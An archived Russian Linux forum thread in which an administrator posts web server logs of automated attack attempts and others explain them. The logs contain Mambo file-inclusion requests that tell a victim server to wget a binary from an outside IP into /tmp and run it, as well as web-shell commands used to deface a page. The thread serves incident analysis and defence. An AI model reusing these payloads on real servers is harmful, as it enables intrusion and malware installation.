LINUX.ORG.RU
ФорумGeneral

В продолжение о вредителях


0

0 

Есть HTTP сервер. В DNS не записан. Сайтов на нем не живет (кроме одного файла index.php).
Ссылок на него нету. В логах обнаружил такое:

212.227.83.130 - - [09/Jun/2006:15:36:58 +0300] "GET /PMA/main.php HTTP/1.0" 404 288
203.172.184.164 - - [09/Jun/2006:17:17:56 +0300] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http
://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20
744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 286
203.172.184.164 - - [09/Jun/2006:17:17:58 +0300] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=c
om_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:
//72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%207
44%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 285
203.172.184.164 - - [09/Jun/2006:17:17:59 +0300] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBAL
S=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;w
get%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 292
203.172.184.164 - - [09/Jun/2006:17:18:01 +0300] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wge
t%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 290
203.172.184.164 - - [09/Jun/2006:17:18:05 +0300] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&a
mp;GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd
%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;ech
o|  HTTP/1.1" 404 301
203.172.184.164 - - [09/Jun/2006:17:18:08 +0300] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GL
OBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/t
mp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 296
203.172.184.164 - - [09/Jun/2006:17:18:08 +0300] "POST /xmlrpc.php HTTP/1.1" 404 286
203.172.184.164 - - [09/Jun/2006:17:18:09 +0300] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
203.172.184.164 - - [09/Jun/2006:17:18:11 +0300] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
203.172.184.164 - - [09/Jun/2006:17:18:12 +0300] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
203.172.184.164 - - [09/Jun/2006:17:18:14 +0300] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
203.172.184.164 - - [09/Jun/2006:17:18:15 +0300] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
203.172.184.164 - - [09/Jun/2006:17:18:17 +0300] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
203.172.184.164 - - [09/Jun/2006:17:18:18 +0300] "POST /xmlrpc.php HTTP/1.1" 404 286
203.172.184.164 - - [09/Jun/2006:17:18:20 +0300] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293
203.172.184.164 - - [09/Jun/2006:17:18:21 +0300] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293

Что бы это могло быть? Спам? Читатели журнала "Хакер"?
Спул почты
vim создает файл *.*~ как это убрать?

> Что бы это могло быть? Спам? Читатели журнала "Хакер"?

Это бот. mod_security или фильтрация на reverse-proxy помогут. Заодно письмо ответственному за [72.18.195.161] - либо его хакнули, либо у него завёлся сильно умный юзер.

nblx
()
Ответ на: комментарий от nblx

Сори, верхнюю строчку не заметил. mod_security и reverse-proxy отменяются :-)

nblx
()

Это бот, "Xakupы" оставляют обычно такое:

87.228.103.17 - - [06/Jun/2006:19:59:09 +0400] "GET /download/share/060416_11:34:27cmd.php?command=echo%20%22Preved!%22%20%3E%3E%20t est.htm HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
87.228.103.17 - - [06/Jun/2006:19:59:33 +0400] "GET /download/share/060416_11:34:27cmd.php?command=echo%20Preved! HTTP/1.1" 200 18 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
87.228.103.17 - - [06/Jun/2006:19:59:36 +0400] "GET /download/share/060416_11:34:27cmd.php?command=echo%20Preved! HTTP/1.1" 200 18 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
87.228.103.17 - - [06/Jun/2006:19:59:42 +0400] "GET /download/share/060416_11:34:27cmd.php?command=echo%20Preved!%20%3E%3E%20test.ht m HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
...
87.228.103.17 - - [06/Jun/2006:20:10:40 +0400] "GET /download/share/060416_11:34:27cmd.php?command=echo%20Hacked%20by%20mr.Sergeant% 20Lion%20King%20%20%20%20%20Uchit'sy%20samim%20nado!!!%20%3E%3E%20../../index.ph p HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

Ключевые слова для grep'а - Preved, Windows, Hacked by =)

AiLr ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Спул почты
General
vim создает файл *.*~ как это убрать?